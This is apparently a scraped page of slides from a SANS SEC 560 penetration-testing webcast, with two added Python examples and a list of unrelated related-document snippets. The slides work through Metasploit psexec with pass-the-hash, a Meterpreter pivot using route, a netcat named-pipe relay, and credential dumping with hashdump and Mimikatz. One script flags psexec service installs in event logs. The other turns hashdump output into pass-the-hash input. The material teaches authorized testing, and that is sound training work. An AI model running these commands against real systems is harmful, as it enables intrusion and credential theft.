A Taste of SANS SEC 560: Adventures in High-Value Pen Testing


Network Penetration Testing and Ethical Hacking
A Taste of SANS SEC 560: Adventures in High-Value Pen Testing
SANS Security 560
Copyright 2015, All Rights Reserved. Version 2Q15

Ed Skoudis (edskoudis)
- Penetration tester and incident handler
- SANS Instructor
- Course author: SANS SEC504 & SEC560
- SANS Pen Test Curriculum Lead
- Director of the NetWars & CyberCity projects
04/06/2015

SEC 560 Course Outline
- 560.1: Comprehensive Planning, Scoping, and Recon
- 560.2: In-Depth Scanning
- 560.3: Exploitation & Post-Exploitation
- 560.4: Password Attacks & Merciless Pivoting
- 560.5: Wireless and Web Apps
- 560.6: Full-Day Pen Test Lab and Capture the Flag Contest

About the SANS SEC 560 Course
- Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking
- Organized around the workflow of professional testers
- Numerous hands-on labs, culminating in a full-day end-to-end penetration test in 560.6
- Tips for avoiding common pitfalls and saving time, to make the tester more efficient and the test safer

A Formal Penetration Testing Definition
Penetration testing involves modeling the techniques used by real-world computer attackers to find vulnerabilities and, under controlled circumstances, to exploit those flaws in a professional, safe manner according to a carefully designed scope and rules of engagement, in order to determine business risk and potential impact, all with the goal of helping the organization improve its security practices.

Why Exploitation?
- False positive reduction or elimination (but even if the exploit doesn't work, you may still want to report the detected vulnerability)
- Proof of vulnerability, and therefore more realistic treatment of risk
- Use of one machine as a pivot point to get deeper inside the network
- More of a sense of what a real bad guy can accomplish
- Exploitation leads to post-exploitation, which really helps us understand the business risks that the target organization faces due to the discovered vulnerabilities
[Diagram: DMZ System, Firewall, Internal System]

Risks of Exploitation
- Service crash
- System crash
- System stability impacted
- System integrity violated
- Data exposure with legal ramifications: as a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information
- Inadvertently accessing the wrong system: out of scope, or even the wrong target organization
Because of these concerns, verify that exploitation is allowed by the Rules of Engagement, and double-check for a given system whether it is in scope. Also, understand the probabilistic nature of exploit success.

The Metasploit Arsenal
[Diagram: an Exploit Collection (Exploit 1 ... Exploit N), a Payload Collection (Payload 1 ... Payload M), Auxiliary Modules (Aux 1 ... Aux N) and Post Modules (Post 1 ... Post N); the User Interface chooses, for example, Exploit 2 with Payload 1, and the Launcher sends the result to the target]
Metasploit divides up the concepts of exploits, payloads, auxiliary modules, and post modules:
- An exploit takes advantage of a flaw in a target program
- The payload makes the target do something the attacker wants
- Auxiliary modules perform all kinds of tasks, including scanning
- A post module is used in post-exploitation to plunder targets or manipulate them

Metasploit psexec Module
- Metasploit includes a fantastic psexec module
- It's an exploit module, although it is not really exploiting a specific vulnerability
- Establishes an SMB session with the target RHOST using a provided admin-level user and password, causing the target to run a specified Metasploit payload
- Writes an executable into the target file system, creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself
- Select it in msfconsole using:
  msf > use exploit/windows/smb/psexec
- Also supports pass-the-hash, authenticating to the target via an admin username and hash
- This module is ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched internal network environment

Psexec & the Pen Tester's Pledge
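One caveat the slide's "cleaning up after itself" invites: the executable and the service are removed, but the Service Control Manager's record of the installation is not. Every service installed on a Windows host is written to the System event log as Event ID 7045, and the pseudo-random service name (and, with the module's default of uploading into the ADMIN$ share, a random executable sitting directly under %SystemRoot%) is what stands out in that record. The Python below is an added example written for this page, not code from the webcast or from Metasploit. The event records are constructed, the ADMIN$ default is assumed from the module's options rather than from the slide, and the "random name" test is a heuristic of mine (letters only, vowel-poor, frequent case changes) that approximates random alphabetic names and needs tuning before it is relied on.

```python
"""Triage Event ID 7045 records for the artefact Metasploit's psexec module leaves.

Added example for this page, not code from the webcast or from Metasploit.
Sample events below are constructed; the 'random name' test is a heuristic.
"""
import re

# Random alphabetic names of the kind the module generates: only letters, 8-16 of them.
LETTERS_ONLY = re.compile(r"^[A-Za-z]{8,16}$")
# Module default is to upload into the ADMIN$ share, i.e. %SystemRoot% itself
# (assumed from the module's options, not stated on the slide).
SYSROOT_EXE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\([A-Za-z]{8,16})\.exe$", re.I)


def looks_random(name: str) -> bool:
    """Heuristic: letters only, vowel-poor, with many upper/lower case flips.

    Real service names ('WinDefend', 'Spooler') are vowel-rich and flip case
    at most a couple of times; a uniformly random mix of 52 letters does not.
    """
    if not LETTERS_ONLY.match(name):
        return False
    vowel_ratio = sum(ch in "aeiouAEIOU" for ch in name) / len(name)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return vowel_ratio < 0.25 and flips >= 3


def classify(event: dict):
    """Return the list of reasons a 7045 record looks like psexec, or None."""
    if event.get("EventID") != 7045:
        return None
    reasons = []
    if looks_random(event.get("ServiceName", "")):
        reasons.append("random-looking service name")
    m = SYSROOT_EXE.match(event.get("ImagePath", ""))
    if m and looks_random(m.group(1)):
        reasons.append("random-looking executable directly under %SystemRoot% (ADMIN$)")
    # The module runs its payload as SYSTEM, so LocalSystem is the expected
    # account; on its own it proves nothing, so it only strengthens a hit.
    if reasons and event.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons or None


def scan(events):
    """Map ServiceName -> reasons for every event that trips a rule."""
    hits = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits[ev["ServiceName"]] = reasons
    return hits


# Constructed sample events in the shape of parsed 7045/7036 records.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "RjQzKdpWmLe",
     "ImagePath": r"%SYSTEMROOT%\ZxPqLmNaVc.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "WinDefend",
     "ImagePath": r"%SystemRoot%\System32\svchost.exe -k WinDefend",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"',
     "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "RjQzKdpWmLe",
     "ImagePath": "", "AccountName": ""},
]

if __name__ == "__main__":
    for name, why in scan(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(why))
```

Where service-install auditing is enabled, the same installation also appears as Event ID 4697 in the Security log, which survives a wiped System log. The heuristic is deliberately loose and will miss random names that happen to be vowel-heavy or single-case, so treat it as a triage filter rather than a signature.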

Meterpreter Functionality: Pivoting Using Metasploit's route Command
- Metasploit includes a route command to pivot through an already-exploited host via a Meterpreter session
- Carries follow-on exploits and payloads across the Meterpreter session
- Don't confuse this with the Meterpreter route command, which manages routing tables on a compromised system running Meterpreter

  msf > use [exploit1]
  msf > set RHOST [victim1]
  msf > set PAYLOAD windows/meterpreter/reverse_tcp
  msf > exploit
  meterpreter > (CTRL-Z to background the session; msfconsole will display the session ID, sid)
  msf > route add [victim2_subnet] [netmask] [sid]
  msf > use [exploit2]
  msf > set RHOST [victim2]
  msf > set PAYLOAD [payload2]
  msf > exploit

[Diagram: Pen Tester -> Exploit1 -> Meterpreter on Victim1 -> Exploit2 and Payload2 -> Victim2]

Sending Through a Netcat Relay to Pivot Through Linux
On the Linux relay machine, a listener on TCP 445 is wired back-to-back with a client to the target through a named pipe, so that traffic sent to the relay's port 445 reaches the target and the replies come back the same way:

  # mknod backpipe p
  # nc -l -p 445 0<backpipe | nc [target] 445 | tee backpipe

[Diagram: Attacker (client) -> Linux Relay Machine (listener, client) -> Target Service; mount share, psexec, grab hashes, etc.]
The attacker then points SMB tools at the relay rather than at the target:

  C:\> net use \\Linux\c$ [password] /u:[user]

Dumping Authentication Information from Memory with Mimikatz
- Mimikatz was created by Benjamin Delpy (also known as gentilkiwi)
- Pulls authentication information from memory on a machine
- Searches through LSASS memory at various specific locations, looking for password hashes and ***clear-text passwords***
- Originally a separate executable (mimikatz.exe) to load on a target machine and run
- Now it's also a Metasploit Meterpreter module

Course Roadmap
Planning and Recon; Scanning; Exploitation & Post-Exploitation; Password Attacks; Wireless Attacks; Web App Attacks
Password Attacks section:
- Motivation and Definitions
- Password Attack Tips
- Account Lockout
- Password Guessing with THC-Hydra (Lab: Hydra)
- Password Representation Formats
- Obtaining Hashes (Lab: Fgdump & Netcat Pivot)
- Hashdump
- More Hash Dumping Options (Lab: Msf psexec & Mimikatz)
- John the Ripper (Lab: John the Ripper)
- Cain (Lab: Cain)
- Rainbow Table Attacks (Lab: Ophcrack)
- Pass-the-Hash Attacks (Lab: Pass-the-Hash)

Using MSF psexec, a Netcat Relay, Meterpreter, & hashdump
[Diagram: Your Linux Metasploit box -> Compromised Linux DMZ Target (Netcat listener and client) -> Target 1 Services, via psexec; Meterpreter and hashdump run on Target 1; Target 2 Services sit beyond it]

Launching Metasploit and Choosing the psexec Module

Configuring Metasploit (1)

Configuring Metasploit (2)
[Diagram: Your Linux Metasploit box -> Linux Target (relay) -> psexec -> Meterpreter]

Preparing the Relay & Exploiting
[Diagram: Your Linux Metasploit box -> Linux Target (relay) -> psexec -> Meterpreter]
Look at the details of this session's connection, between the far end and your Linux box.

Dumping the Hashes
Note that run hashdump can also dump password hints that users create, if they are present.
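The hashdump output feeds two things already on this page: the psexec module's pass-the-hash support from the earlier slide, which takes a hashdump line's LM:NT pair as the password, and the "Password Representation Formats" topic in the roadmap. The Python below is an added example written for this page, not code from the webcast or from Metasploit. The "user:rid:lmhash:nthash:::" line format is what Meterpreter's hashdump prints; the sample lines are constructed. MD4 is implemented in place because hashlib's md4 is frequently unavailable under OpenSSL 3, and the two constants are the well-known LM value meaning "no LM hash stored" and the NT hash of the empty password.

```python
"""Triage Meterpreter hashdump output and build pass-the-hash input for psexec.

Added example for this page, not code from the webcast or from Metasploit.
The line format user:rid:lmhash:nthash::: is what hashdump prints; the sample
lines below are constructed. MD4 is implemented here because hashlib.new('md4')
is often unavailable under OpenSSL 3.
"""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def md4(data: bytes) -> bytes:
    """MD4 as in RFC 1320 (pure Python; fine for a few hashes, not for cracking)."""
    mask = 0xFFFFFFFF

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"          # pad: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                p = (-i) % 4                       # updates a, d, c, b, a, d, ... in turn
                b, c, d = r[(p + 1) % 4], r[(p + 2) % 4], r[(p + 3) % 4]
                r[p] = rol((r[p] + fn(b, c, d) + X[idx] + k) & mask, shifts[i % 4])
        state = [(s + t) & mask for s, t in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: unsalted MD4 over the UTF-16LE password, as stored in the SAM."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """Parse user:rid:lm:nt::: lines into dicts; skips blanks and comments."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or line.lstrip().startswith("#"):
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def triage(rows):
    """Per-user findings worth reporting before any cracking, plus the
    LM:NT string the psexec module accepts as SMBPass for pass-the-hash."""
    users_by_nt = {}
    for r in rows:
        users_by_nt.setdefault(r["nt"], []).append(r["user"])
    out = {}
    for r in rows:
        flags = []
        if r["nt"] == EMPTY_NT:
            flags.append("blank-password")
        if r["lm"] != EMPTY_LM:
            flags.append("lm-hash-present")       # LM is trivially crackable; should be disabled
        others = [u for u in users_by_nt[r["nt"]] if u != r["user"]]
        if others and r["nt"] != EMPTY_NT:
            flags.append("nt-shared-with:" + ",".join(others))
        out[r["user"]] = {"rid": r["rid"], "flags": flags, "smbpass": f"{r['lm']}:{r['nt']}"}
    return out


def check_candidates(rows, candidates):
    """Which accounts use one of a handful of candidate passwords (no cracker needed)."""
    lookup = {nt_hash(c): c for c in candidates}
    return {r["user"]: lookup[r["nt"]] for r in rows if r["nt"] in lookup}


# Constructed sample in hashdump's format: three accounts share the NT hash of
# 'password', one legacy account still has an LM hash, and Guest is blank.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_HASHDUMP)
    for user, info in triage(rows).items():
        print(f"{user:14} {info['smbpass']}  {' '.join(info['flags'])}")
    print(check_candidates(rows, ["Winter2015", "password"]))
```

The smbpass value is what you would set as SMBPass (with SMBUser set to the account) on exploit/windows/smb/psexec to reuse a dumped hash without cracking it; a shared NT hash across accounts is worth reporting on its own, since one cracked or replayed hash then opens every account in the group.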

Using msf route to Pivot and Mimikatz
Let's use the msf route command to pivot across our existing Meterpreter session to attack a second target, getting Meterpreter on it and then loading Mimikatz.
[Diagram: Your Linux Metasploit box -> Compromised Linux DMZ Target -> existing Meterpreter session; msf route pivots through that session for psexec on the second DMZ target (TCP 445 allowed from the first target's network) -> new Meterpreter session; load Mimikatz and dump hashes & passwords]

Background Session & Prepare to Attack
[Diagram: Your Linux Metasploit box (port 80) -> Linux Target -> existing Meterpreter session; msf route pivots through it for psexec on the second target -> new Meterpreter session]

Exploit Through the Pivot
As long as you see the meterpreter > prompt here, it worked. Don't worry about the "Exploit failed" warning: as long as you see "Session N created", it worked.

Get System Info
[Diagram: Your Linux Metasploit box; existing Meterpreter session (port 80); new Meterpreter session (port 443); load Mimikatz and dump hashes & passwords]
Our session is with the second target!

Load Mimikatz and Dump Passwords
Clear-text password below!

Exiting & Lab Conclusions
In this lab, we've seen how to use Metasploit's psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes. And we've seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz and dump clear-text passwords.

Webcast Conclusions
- Pen testing can help a target organization better understand its risk posture and manage risks
- Penetration testers can take advantage of plentiful tools and techniques in our work:
  - Metasploit and the Meterpreter
  - psexec for code execution, via Netcat relays and msfconsole route for pivots
  - hashdump and Mimikatz for credentials
- Know your tools in depth, and never lose your focus on providing as much business value as you can in your penetration test!
It's not the weapon that's important; it's the ninja wielding it.


Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Devanshu Bhatt Abstract: Penetration testing is extremely crucial method to discover weaknesses in systems and

More information

PENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco

PENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco PENETRATION TESTING A HattdA-Oti Introduction to Hacking by Georgia Weidman no starch press San Francisco CONTENTS IN DETAIL FOREWORD by Peter Van Eeckhoutte xix ACKNOWLEDGMENTS xxiii INTRODUCTION

More information

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker Learn to find security vulnerabilities before the bad guys do! The Certified Ethical Hacker (CEH) class immerses students in an interactive environment

More information

Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring

Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring Learning Objective Explain the importance of security audits, testing, and monitoring to effective security policy.

More information

Coding for Penetration

Coding for Penetration Coding for Penetration Testers Building Better Tools Jason Andress Ryan Linn ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO SINGAPORE SYDNEY TOKYO Syngress is

More information

Computer Security 2017

Computer Security 2017 Computer Security 2017 Lab 1: Passwords, access control, and remote exploitation of Windows 7 This lab will be done in groups of 2 people. There are preparatory assignments for this lab, read through the

More information

Computer Security 2017

Computer Security 2017 Computer Security 2017 Lab 1: Passwords, access control, and remote exploitation of Windows 7 This lab will be done in groups of 2 people. There are preparatory assignments for this lab, read through the

More information

ITSY 2330 Intrusion Detection Course Syllabus

ITSY 2330 Intrusion Detection Course Syllabus ITSY 2330 Intrusion Detection Course Syllabus Instructor Course Reference Number (CRN) Course Description: Course Prerequisite(s) Course Semester Credit Hours (SCH) (Lecture, Lab) Name: Hung Le Tel: Office:

More information

Trustwave Managed Security Testing

Trustwave Managed Security Testing Trustwave Managed Security Testing SOLUTION OVERVIEW Trustwave Managed Security Testing (MST) gives you visibility and insight into vulnerabilities and security weaknesses that need to be addressed to

More information

Expert Webinar: Hacking Your Windows IT Environment

Expert Webinar: Hacking Your Windows IT Environment Expert Webinar: Hacking Your Windows IT Environment Presenters: Liam Cleary Microsoft MVP, Blogger helloitsliam@protonmail.com Jeff Melnick Pre-Sales Director, Netwrix Jeff.Melnick@netwrix.com www.helloitsliam.com

More information

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Welcome Back! A Quick Recap of the Last Presentation: Overview of web technologies. What it is. How it works. Why it s attractive

More information

18-642: Security Mitigation & Validation

18-642: Security Mitigation & Validation 18-642: Security Mitigation & Validation 11/27/2017 Security Migitation & Validation Anti-Patterns for security mitigation & validation Poorly considered password policy Poorly considered privilege management

More information

Chapter 5: Vulnerability Analysis

Chapter 5: Vulnerability Analysis Chapter 5: Vulnerability Analysis Technology Brief Vulnerability analysis is a part of the scanning phase. In the Hacking cycle, vulnerability analysis is a major and important part. In this chapter, we

More information

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account ETHICAL HACKING LAB SERIES Lab 3: Using the SYSTEM Account Certified Ethical Hacking Domain: System Hacking Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution

More information

Security Testing. John Slankas

Security Testing. John Slankas Security Testing John Slankas jbslanka@ncsu.edu Course Slides adapted from OWASP Testing Guide v4 CSC 515 Software Security What is Security Testing? Validate security controls operate as expected What

More information

Pivoting ( Metasploit )

Pivoting ( Metasploit ) Pivoting ( Metasploit ) - Anurag Srivastava Email - Linkedin - theanuragsrivastava@gmail.com https://in.linkedin.com/in/hexachordanu Exploit-db Author page https://www.exploit-db.com/author/?a=9053 Greetz

More information

MQ Jumping... Or, move to the front of the queue, pass go and collect 200

MQ Jumping... Or, move to the front of the queue, pass go and collect 200 MQ Jumping.... Or, move to the front of the queue, pass go and collect 200 Martyn Ruks DEFCON 15 2007-08-03 One Year Ago Last year I talked about IBM Networking attacks and said I was going to continue

More information

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE s3security.com Security Professional Services S3 offers security services through its Security Professional Services (SPS) group, the security-consulting

More information

ICS Penetration Testing

ICS Penetration Testing Connor Leach Jackson Evans-Davies 18 June, 2018 ICS Penetration Testing Understanding the Challenges and Techniques Introductions 1 Connor Leach, GPEN, OSCP - Senior Penetration Tester - Member of Canadian

More information

ANATOMY OF AN ATTACK!

ANATOMY OF AN ATTACK! ANATOMY OF AN ATTACK! Are Your Crown Jewels Safe? Dom Kapac, Security Evangelist WHAT DO WE MEAN BY CROWN JEWELS? Crown jewels for most organizations are critical infrastructure and data Data is a valuable

More information

The Six Most Dangerous New Attack Techniques And What s Coming Next? Ed Skoudis CounterHackChallenge

The Six Most Dangerous New Attack Techniques And What s Coming Next? Ed Skoudis CounterHackChallenge The Six Most Dangerous New Attack Techniques And What s Coming Next? MODERATOR: Alan Paller SANS Institute PANELISTS: Ed Skoudis CounterHackChallenge Johannes Ullrich SANS Internet Storm Center Session

More information

COPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51

COPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51 Acknowledgments Introduction Part I: The Basics in Depth 1 Chapter 1: Windows Attacks 3 Attack Classes 3 Automated versus Dedicated Attacker 4 Remote versus Local 7 Types of Attacks 8 Dedicated Manual

More information

Building Payloads Tutorial

Building Payloads Tutorial Building Payloads Tutorial Last updated 06/23/2014-4.9 With Metasploit Pro, you can build payloads with the Payload Generator. The Payload Generator provides a guided interface that you can use to quickly

More information

mhealth SECURITY: STATS AND SOLUTIONS

mhealth SECURITY: STATS AND SOLUTIONS mhealth SECURITY: STATS AND SOLUTIONS www.eset.com WHAT IS mhealth? mhealth (also written as m-health) is an abbreviation for mobile health, a term used for the practice of medicine and public health supported

More information

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo ETHICAL HACKING (CEH) CURRICULUM Introduction to Ethical Hacking What is Hacking? Who is a Hacker? Skills of a Hacker? Types of Hackers? What are the Ethics and Legality?? Who are at the risk of Hacking

More information

A Model for Penetration Testing

A Model for Penetration Testing A Model for Penetration Testing Chuck Easttom Collin College Professional Development chuck@chuckeasttom.com Research Gate Publication Abstract Penetration testing is an increasingly integral part of cyber

More information

Cybersecurity Test and Evaluation Achievable and Defensible Architectures

Cybersecurity Test and Evaluation Achievable and Defensible Architectures Cybersecurity Test and Evaluation Achievable and Defensible Architectures October 2015, ITEA Francis Scott Key Chapter Mr. Robert L. Laughman for COL Scott D. Brooks, Director, Survivability Evaluation

More information

Evaluating Website Security with Penetration Testing Methodology

Evaluating Website Security with Penetration Testing Methodology Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia

More information

Define information security Define security as process, not point product.

Define information security Define security as process, not point product. CSA 223 Network and Web Security Chapter One What is information security. Look at: Define information security Define security as process, not point product. Define information security Information is

More information

Active Defence A chance to fight back. Dott. Agostino PANICO Rome, 09/06/2016

Active Defence A chance to fight back. Dott. Agostino PANICO Rome, 09/06/2016 Active Defence A chance to fight back Dott. Agostino PANICO Rome, 09/06/2016 $ cut -f5 -d: /etc/passwd grep -i panico PhD Student @ La Sapienza University of Rome Master Governance e Audit dei Sistemi

More information